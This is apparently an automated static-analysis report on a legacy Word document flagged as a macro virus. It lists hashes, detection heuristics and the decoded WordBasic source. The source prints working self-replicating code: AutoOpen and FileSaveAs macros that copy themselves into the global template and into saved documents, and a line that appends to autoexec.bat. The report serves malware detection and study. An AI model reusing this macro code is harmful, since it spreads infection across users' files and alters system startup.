Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e4a33bf626d5f505…

MALICIOUS

Office (OLE)

46.0 KB Created: 1993-09-28 22:08:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 71cd05563ba9443751f1e8d6d6cc9b18 SHA-1: 298fd316c650754017c1ba32942a7fbfce2bfb16 SHA-256: e4a33bf626d5f505ea4b5907c4c0da51e782ece2a73f0327f5e6e05ee3bfe46e
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file contains legacy WordBasic macros, including an AutoOpen macro designed to execute automatically upon opening. The FileSaveAs macro is intended to copy itself and other macros to newly saved documents, indicating a self-replicating macro virus. The ClamAV detection further confirms its malicious nature.

Heuristics 4

  • ClamAV: Doc.Trojan.Sig-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Sig-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7304 bytes
SHA-256: 24ea8cf0f514542a813bfc8bc681cfbf50a165f3e638b340a489c0b1aee530c6
Detection
ClamAV: Doc.Trojan.Sig-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "FileSaveAs"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Copies the virus from NORMAL.DOT onto every document saved using SaveAs."
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileSaveAs.MAIN"
Dim CurrentFile$
Dim CopyParameter$
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
WordBasic.CurValues.FileSaveAs dlg
WordBasic.Dialog.FileSaveAs dlg
If dlg.Format = 0 Then dlg.Format = 1
CurrentFile$ = WordBasic.[FileName$]()
CopyParameter$ = CurrentFile$ + ":FileSaveAs"
WordBasic.MacroCopy "Global:FileSaveAs", CopyParameter$
CopyParameter$ = CurrentFile$ + ":Signature"
WordBasic.MacroCopy "Global:Signature", CopyParameter$
CopyParameter$ = CurrentFile$ + ":AutoOpen"
WordBasic.MacroCopy "Global:AutoOpen", CopyParameter$
WordBasic.FileSaveAs dlg    'This line is part of the Word default
End Sub

Attribute VB_Name = "Signature"

Public Sub MAIN()
Attribute MAIN.VB_Description = "The virus signature file.\r\n"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.Signature.MAIN"

    Rem Chris' Word macro virus signature file.

End Sub

Attribute VB_Name = "AutoOpen"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Automatically executes when the file is opened and installs the macro virus."
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.AutoOpen.MAIN"
Dim Title$
Dim TotalMacros
Dim CurrentMacro
Dim AlreadyInstalled
Dim Install
Dim CurrentFile$
Dim CopyParameter$
Dim name_$

On Error GoTo -1: On Error GoTo Finish
Title$ = "HELL for Windows"
TotalMacros = WordBasic.CountMacros(0)
For CurrentMacro = 1 To TotalMacros
    If WordBasic.[MacroName$](CurrentMacro) = "Signature" Then
        AlreadyInstalled = -1
    End If
Next CurrentMacro
If AlreadyInstalled Then
End If
If Not AlreadyInstalled Then
Install = 1
If Install Then
    CurrentFile$ = WordBasic.[FileName$]()  'Put current filename into Currentfile$
    CopyParameter$ = CurrentFile$ + ":AutoOpen" 'Make #1 arg for MacroCp
    WordBasic.MacroCopy CopyParameter$, "Global:AutoOpen"   'in MacroCopy command
    CopyParameter$ = CurrentFile$ + ":Signature"
    WordBasic.MacroCopy CopyParameter$, "Global:Signature"
    CopyParameter$ = CurrentFile$ + ":FileSaveAs"
    WordBasic.MacroCopy CopyParameter$, "Global:FileSaveAs"
End If
End If
name_$ = "c:\autoexec.bat"
Open name_$ For Append As 1
Print #1, "WIN"
Close 1
Finish:

End Sub

' Processing file: /opt/analyzer/scan_staging/ec23f07b4a6a4afeb45b9d2f1ef34d10.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 965 bytes
' Macros/VBA/FileSaveAs - 2166 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Public Sub MAIN())
' Line #2:
' 	Dim 
' 	VarDefn CurrentFile
' Line #3:
' 	Dim 
' 	VarDefn CopyParameter
' Line #4:
' 	Dim 
' 	VarDefn dlg (As Object)
' 	BoS 0x0000 
' 	SetStmt 
' 	LitVarSpecial (False)
' 	Ld WordBasic 
' 	MemLd DialogRecord 
' 	ArgsMemLd FileSaveAs 0x0001 
' 	Set dlg 
' Line #5:
' 	Ld dlg 
' 	Ld WordBasic 
' 	MemLd CurValues 
' 	ArgsMemCall FileSaveAs 0x0001 
' Line #6:
' 	Ld dlg 
' 	Ld WordBasic 
' 	MemLd Dialog 
' 	ArgsMemCall FileSaveAs 0x0001 
' Line #7:
' 	Ld dlg 
' 	MemLd Format$ 
' 	LitDI2 0x0000 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitDI2 0x0001 
' 	Ld dlg 
' 	MemSt Format$ 
' 	EndIf 
' Line #8:
' 	Ld WordBasic 
' 	ArgsMemLd [FileName$] 0x0000 
' 	St CurrentFile$ 
' Line #9:
' 	Ld CurrentFile$ 
' 	LitStr 0x000B ":FileSaveAs"
' 	Add 
' 	St CopyParameter$ 
' Line #10:
' 	LitStr 0x0011 "Global:FileSaveAs"
' 	Ld CopyParameter$ 
' 	Ld WordBasic 
' 	ArgsMemCall MacroCopy 0x0002 
' Line #11:
' 	Ld CurrentFile$ 
' 	LitStr 0x000A ":Signature"
' 	Add 
' 	St CopyParameter$ 
' Line #12:
' 	LitStr 0x0010 "Global:Signature"
' 	Ld CopyParamet
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.